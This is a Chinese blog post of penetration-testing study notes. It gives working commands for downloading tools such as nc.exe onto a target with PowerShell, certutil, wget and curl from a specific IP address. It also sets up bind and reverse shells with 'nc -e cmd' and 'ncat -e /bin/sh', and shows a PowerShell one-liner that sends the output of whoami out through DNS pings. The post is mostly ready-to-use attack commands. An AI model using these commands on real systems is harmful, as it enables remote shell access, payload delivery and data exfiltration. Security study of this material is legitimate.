基本渗透命令

mikuku10个月前叽里咕噜小代码309

文件上传下载-解决无图形化-解决数据传输

Windows文件下载命令

pwershell:

powershell.exe -Command "Invoke-WebRequest -Uri http://121.43.143.58:80/ew.jpg -OutFile ew.png"

cmd:

certutil.exe -urlcache -split -f http://121.43.143.58:80/ew.jpg ew.png

linux文件下载命令

wget http://121.43.143.58:80/ew.jpg -O ew.png
curl http://121.43.143.58:80/ew.jpg -o ew.png

反弹SHELL命令-解决数据回显-解决数据通讯

正向连接:本地连接-等待监听

linux-控制->windows

/绑定cmd到5566端口

nc -e cmd -lvvp 5566

image.png

/主动连接目标5566

 ncat 121.43.143.58 5566

image.png

windows-控制->linux

/绑定sh到本地5566端口

 ncat -e /bin/sh -lvp 5566

image.png

/主动连接目标5566

nc 47.242.156.108 5566

反向连接

结果相同,不作过多赘述。


shell反弹:

1.首先判断操作系统

由于windows没有nc,我们可以利用漏洞上传到服务器

文件上传windows:

certutil.exe -urlcache -split -f http://121.43.143.58:80/nc.exe E:\\nc.exe

linux:

curl http://121.43.143.58:80/nc.exe -o nc.exe


已知漏洞:

数据不回显:
1.反弹shell

2.带外查询

cmd里无法使用whoami

用powershell变量赋值,把whoami执行结果给变量

结果带有“\”,导致ping无法执行,所以使用replace替换字符

powershell|| $x=whoami;$x=$x.replace('\','xxx');$y=.'某个地址';$z=$x+$y;ping $z

image.png

image.png





返回列表

上一篇:心脏

下一篇:基础入门

相关文章

WEB攻防-XSS跨站注入(一)

WEB攻防-XSS跨站注入(一)

XSS跨站漏洞,这个漏洞的原理就是通过可控制的某些函数,植入payload然后用户通过访问到这个被攻击的地方触发了漏洞,然后就执行了一次攻击,听起来好像就没啥,这个漏洞确实也没啥,因为他大部分都是在前...

WEB攻防-ASP-数据库漏洞

WEB攻防-ASP-数据库漏洞

前面叽里咕噜开发整了还挺久,然后挖了很多坑,现在终于是要填坑了,从这一期开始就开始注重漏洞方面的知识了,学习各种漏洞利用,天天日别人网站哈不过其实还有个java没学,那个还是挺重要的,但是吧最近确实没...

安全开发-web应用-PHP-留言板与登录防护

安全开发-web应用-PHP-留言板与登录防护

当你获得了目标的源码,这时候代码审计看不懂了怎么办,这时候就要学习到奇妙的web开发了,然后学会之后就可以转行去做开发了,当什么网安工程师(狗头)对于我们而言,我们要学习的语言就是通常web开发中经常...

安全开发-web应用-JS-dom_xss-断点调试

安全开发-web应用-JS-dom_xss-断点调试

上期我们简单的学习了关于js的文件上传和登录验证,相信大家对那部分的漏洞已经有所了解了,这期我们来看看关于js的外的一些知识DOM树操作以及安全隐患加密编码和数据安全测试这两个因为关系不大,就新开一期...

安全开发-web应用-PHP-文件访问和操作

安全开发-web应用-PHP-文件访问和操作

前面我们学习了php普通的留言板功能和登录的操作,还学习了三种身份验证的小知识相信经过自己的敲敲,已经对这部分的相应漏洞已经有所了解了,哪些地方有漏洞,哪些地方可以注入,学习开发就是了解这些最基本的原...

WEB攻防-PHP-文件管理

WEB攻防-PHP-文件管理

关于文件还剩下一些小芝士,这期就来说一下 首先就来说说关于读取文件和下载文件的漏洞哈,我们在安全开发中就已经提过一次,如果没有控制好这个下载的话,可能他就直接可以下载一下敏感文件了,读取也是...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。